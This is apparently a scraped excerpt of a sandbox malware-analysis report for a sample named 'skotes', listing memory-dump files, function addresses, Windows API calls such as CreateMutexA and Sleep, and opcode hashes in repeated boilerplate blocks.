Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: Eastern Standard Time$Eastern Summer Time$Xgx
API String ID: 565725191-2331726656
Opcode ID: c7326216db1341deb76230ef1ee1192b4291de6d202aa0cf48a6265e1f8464f5
Instruction ID: 83a433bf9845fef1e79caa132a6eb2ff1a4a035b8f619b87b6a9bde04bcd45f7
Opcode Fuzzy Hash: c7326216db1341deb76230ef1ee1192b4291de6d202aa0cf48a6265e1f8464f5
Instruction Fuzzy Hash: AE51E771900219EFDF14EF689C459AE77B8FB44390B14C66AE528A3193E73C9E438B91

Function 00766FB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00766EE6), ref: 00766FD6
GetFileInformationByHandle.KERNEL32(?,?), ref: 00767030
__dosmaperr.LIBCMT ref: 007670C5

Part of subcall function 0076732A: __dosmaperr.LIBCMT ref: 0076735F

Strings

nv, xrefs: 00766FCE

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID: nv
API String ID: 2531987475-2787706556
Opcode ID: ca63c794880fb7f21c020268f8512a425a253897a078dbf049e7ace6d684de28
Instruction ID: 27528d9116f032e67a6d1eb800c303fdcd09fb88e62bcd2b463553a7472e14c2
Opcode Fuzzy Hash: ca63c794880fb7f21c020268f8512a425a253897a078dbf049e7ace6d684de28
Instruction Fuzzy Hash: 06417F71904208ABDB28DFB5DC459AFB7F9EF89344B10452EFC57D3211EA39A940CB21

Function 00739BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00739BA8
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 0d5e92529f53883f5fedde59d5317b483b64f14e882e39b0425a61d90c76d4fe
Instruction ID: f14ff2839250c9b7ca092d9cdead84cc29131e9c8e5a1dae0065b6204f28e07f
Opcode Fuzzy Hash: 0d5e92529f53883f5fedde59d5317b483b64f14e882e39b0425a61d90c76d4fe
Instruction Fuzzy Hash: D43168717042049BFB18DB78DC8A76DB7A2EBC1310F208219E154AB3D7D77D99808762

Function 00739CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00739CDD
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: eee953c35460a2e113f9763a1ef1c0377399aed4bbc97c73ecf5b4323e6e0c65
Instruction ID: 6c9fa231c905b193f1130c71087fda80eeb1bc18775721ff4c2bc766a4e5025c
Opcode Fuzzy Hash: eee953c35460a2e113f9763a1ef1c0377399aed4bbc97c73ecf5b4323e6e0c65
Instruction Fuzzy Hash: 4D3144317141449BFF18DBBCCC8A7ADB762EBC6310F248219E144AB3D6D77D99808722

Function 00739F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 00739F47
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesCreateFileMutexSleep
String ID: T2y
API String ID: 396266464-1348321943
Opcode ID: 3c53dacb8f3f9d1daaba519be961e58b44317c743d697b6034898dfd82caca69
Instruction ID: 99a5d704ff749e58a598e0c69bd80e79f7053a1ec20426e4d7acf1077cc90ab6
Opcode Fuzzy Hash: 3c53dacb8f3f9d1daaba519be961e58b44317c743d697b6034898dfd82caca69
Instruction Fuzzy Hash: 06315B31704104ABFB18DB78DC8A7ADB762EBC5314F204219E194EB3D7D77D99818762

Function 0073A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136sleepsynchronizationCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0073A07C
Sleep.KERNEL32(00000064,?), ref: 0073A963
CreateMutexA.KERNEL32(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
